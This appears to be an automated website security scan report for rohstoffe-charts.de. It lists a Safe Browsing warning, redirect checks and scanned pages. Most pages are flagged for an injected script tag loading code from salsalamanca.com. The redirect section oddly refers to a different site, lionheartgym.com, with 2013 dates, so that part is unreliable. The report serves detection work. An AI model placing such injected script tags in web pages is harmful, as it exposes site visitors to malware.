Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rohstoffe-charts.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lionheartgym.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Jul 2013 18:19:32 GMT
Accept-Ranges: bytes
ETag: "211f5-e73-4e1eb47d00d21"
Server: nginx/1.5.2
Content-Length: 3699
Content-Type: text/html
Last-Modified: Sat, 20 Jul 2013 06:09:05 GMT
...3699 bytes of data.
GET / HTTP/1.1
Host: lionheartgym.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Jul 2013 18:19:32 GMT
Accept-Ranges: bytes
ETag: "211f5-e73-4e1eb47d00d21"
Server: nginx/1.5.2
Content-Length: 3699
Content-Type: text/html
Last-Modified: Sat, 20 Jul 2013 06:09:05 GMT
...3699 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lionheartgym.com
Referer: http://www.google.com/search?q=lionheartgym.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lionheartgym.com
Referer: http://www.google.com/search?q=lionheartgym.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://rohstoffe-charts.de/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 10 Sep 2014 03:31:19 GMT Location: http://www.rohstoffe-kurse.de/rohstoffe-charts.htm Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
http://www.rohstoffe-kurse.de/rohstoffe-charts.htm | 200 OK Content-Length: 6382 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350356"></script> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21347 Content-Type: text/javascript | clean |
http://rohstoffe-charts.de/index.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 10 Sep 2014 03:31:20 GMT Location: http://www.rohstoffe-kurse.de/rohstoffe-charts.htm/index.html Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
http://www.rohstoffe-kurse.de/rohstoffe-charts.htm/index.html | 404 Not Found Content-Length: 1568 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350373"></script> | ||
http://www.rohstoffe-kurse.de/ | 200 OK Content-Length: 6683 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350332"></script> | ||
http://www.rohstoffe-kurse.de/index.html | 200 OK Content-Length: 6683 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350332"></script> | ||
http://www.rohstoffe-kurse.de/kontakt.htm | 200 OK Content-Length: 4167 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350338"></script> | ||
http://www.rohstoffe-kurse.de/edelmetalle.htm | 200 OK Content-Length: 4371 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350324"></script> | ||
http://www.rohstoffe-kurse.de/energie.htm | 200 OK Content-Length: 3500 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350325"></script> | ||
http://www.rohstoffe-kurse.de/agrar.htm | 200 OK Content-Length: 4557 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350317"></script> | ||
http://www.rohstoffe-kurse.de/industrie_metalle.htm | 200 OK Content-Length: 6553 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350333"></script> | ||
http://www.rohstoffe-kurse.de/gold.htm | 200 OK Content-Length: 5433 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350327"></script> | ||
http://www.rohstoffe-kurse.de/oelpreis.htm | 200 OK Content-Length: 6089 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350343"></script> | ||
http://www.rohstoffe-kurse.de/boersenkurse_iphone.htm | 200 OK Content-Length: 6525 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350321"></script> | ||
http://www.rohstoffe-kurse.de/Scripts/AC_ActiveX.js | 404 Not Found Content-Length: 1568 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350373"></script> | ||
http://www.rohstoffe-kurse.de/test404page.js | 404 Not Found Content-Length: 1568 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://salsalamanca.com/kqwjprzt.php?id=5350373"></script> |